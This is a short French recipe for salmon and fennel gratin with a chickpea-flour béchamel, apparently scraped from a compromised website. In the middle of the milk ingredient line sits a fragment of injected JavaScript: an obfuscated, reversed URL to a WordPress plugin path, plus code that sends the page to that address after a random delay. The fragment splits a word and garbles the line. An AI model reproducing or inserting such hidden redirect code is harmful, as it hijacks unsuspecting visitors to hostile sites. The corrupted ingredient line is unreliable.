
GRATIN DE SAUMON ET FENOUIL, BÉCHAMEL IG BAS
Pour 4 Pers.
INGRÉDIENTS :
– 4 pavés de saumon
– 2 fenouil
– 4 CS huile d’olive
– 40g farine de pois chiche
– 400ml de lait ½ ecrémé (si possible sans lactoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tose – type “matin léger de lactel”)
– muscade, sel & poivre
– persil ciselé congelé
– parmesan (optionnel)
cuire le saumon 2 minutes sur puissance maximum au micro-onde, dans un plat adapté avec un peu de sel.
Le saumon doit être juste cuit, il peut encore être un peu rose.
Émincer le fenouil (petits dés) et le cuire 8 minutes au micro-onde dans un plat adapté avec du sel et un peu d’eau.
Égouter puis mélanger le saumon et le fenouil avec un peu de persil haché.
Transvaser dans un plat a gratin.
Préchauffer le four en position grill.
Dans une casserole, chauffer l’huile et rajouter la farine.
Mélanger au fouet, le mélange devient mousseux.
Rajouter le lait froid en 1 fois, cuire quelques minutes jusqu’à ce que le mélange épaississe.
Assaisonner selon votre goûts.
Napper le mélange fenouil/saumon de la béchamel.
NB : On peut également parsemer le gratin de parmesan
Faire gratiner quelques minutes et servir aussitôt. Ce plat peut être servi seul le soir ou le midi accompagné de riz basmati complet
Bon appétit !
